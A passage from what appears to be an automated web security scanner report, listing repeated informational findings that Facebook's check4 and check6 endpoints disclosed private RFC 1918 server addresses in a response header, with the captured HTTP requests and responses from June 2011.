Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18d5e5274%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1de4dacf4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.15.50
X-Cnection: close
Date: Thu, 16 Jun 2011 15:41:51 GMT

/*1308238911,171314994*/

window._ip_w["check4"] = 0;

19.156. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.114.55

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe01abf48%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff284b08ca8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.114.55
X-Cnection: close
Date: Thu, 16 Jun 2011 13:06:51 GMT

/*1308229611,171864631*/

window._ip_w["check4"] = 0;

19.157. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.148.56

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.148.56
X-Cnection: close
Date: Thu, 16 Jun 2011 18:37:44 GMT

/*1308249464,171873336*/

window._ip_w["check4"] = 0;

19.158. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.241.37

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df236de4684%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.241.37
X-Cnection: close
Date: Thu, 16 Jun 2011 12:46:17 GMT

/*1308228377,171372837*/

window._ip_w["check4"] = 0;

19.159. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.20.54

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df316483ae%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.20.54
X-Cnection: close
Date: Thu, 16 Jun 2011 15:16:02 GMT

/*1308237362,171840566*/

window._ip_w["check4"] = 0;

19.160. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.217.44

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df340b9c87%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff34167b284%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.217.44
X-Cnection: close
Date: Thu, 16 Jun 2011 14:03:43 GMT

/*1308233023,171366700*/

window._ip_w["check4"] = 0;

19.161. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.69.52

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.69.52
X-Cnection: close
Date: Thu, 16 Jun 2011 17:35:36 GMT

/*1308245736,171328820*/

window._ip_w["check4"] = 0;

19.162. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.116.32

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.116.32
X-Cnection: close
Date: Thu, 16 Jun 2011 14:08:50 GMT

/*1308233330,171340832*/

window._ip_w["check4"] = 0;

19.163. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.135.31

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.135.31
X-Cnection: close
Date: Thu, 16 Jun 2011 14:55:20 GMT

/*1308236120,171345695*/

window._ip_w["check4"] = 0;

19.164. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.79.30

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.79.30
X-Cnection: close
Date: Thu, 16 Jun 2011 18:42:54 GMT

/*1308249774,171855646*/

window._ip_w["check4"] = 0;

19.165. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.134.32

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2397668d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.134.32
X-Cnection: close
Date: Thu, 16 Jun 2011 15:21:12 GMT

/*1308237672,171345440*/

window._ip_w["check4"] = 0;

19.166. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.241.47

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.241.47
X-Cnection: close
Date: Thu, 16 Jun 2011 19:14:07 GMT

/*1308251647,171372847*/

window._ip_w["check4"] = 0;

19.167. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.168.32

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39c0348ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff28a44e6b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.168.32
X-Cnection: close
Date: Thu, 16 Jun 2011 12:25:30 GMT

/*1308227130,171354144*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.168. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.39.65

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0633434%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27f0385c4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.39.65
X-Cnection: close
Date: Thu, 16 Jun 2011 12:04:45 GMT

/*1308225885,171910977*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.169. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.38.43

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.38.43
X-Cnection: close
Date: Thu, 16 Jun 2011 14:50:09 GMT

/*1308235809,171845163*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.170. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.201.105

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Powered-By: HPHP
X-FB-Server: 10.27.201.105
X-Cnection: close
Date: Thu, 16 Jun 2011 18:37:44 GMT

/*1308249464,169593193*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.171. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.205.126

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.205.126
X-Cnection: close
Date: Thu, 16 Jun 2011 14:55:20 GMT

/*1308236120,169594238*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.172. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.90.39

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.90.39
X-Cnection: close
Date: Thu, 16 Jun 2011 12:35:50 GMT

/*1308227750,171858471*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.173. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.86.49

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0b8eb68%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffdc432e5%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.86.49
X-Cnection: close
Date: Thu, 16 Jun 2011 14:08:54 GMT

/*1308233334,171333169*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.174. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.156.64

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d27b033%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffc3d649fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.156.64
X-Cnection: close
Date: Thu, 16 Jun 2011 13:12:09 GMT

/*1308229929,171875392*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.175. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.131.130

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.131.130
Connection: close
Date: Thu, 16 Jun 2011 16:54:11 GMT

/*1308243251,169902978*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.176. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.160.42

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.160.42
X-Cnection: close
Date: Thu, 16 Jun 2011 18:27:24 GMT

/*1308248844,171352106*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.177. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.209.73

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22e9b92d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff324587f18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.42.209.73
X-Cnection: close
Date: Thu, 16 Jun 2011 15:26:23 GMT

/*1308237983,170578249*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.178. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.121.40

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2cfe77904%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff19ecc276%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
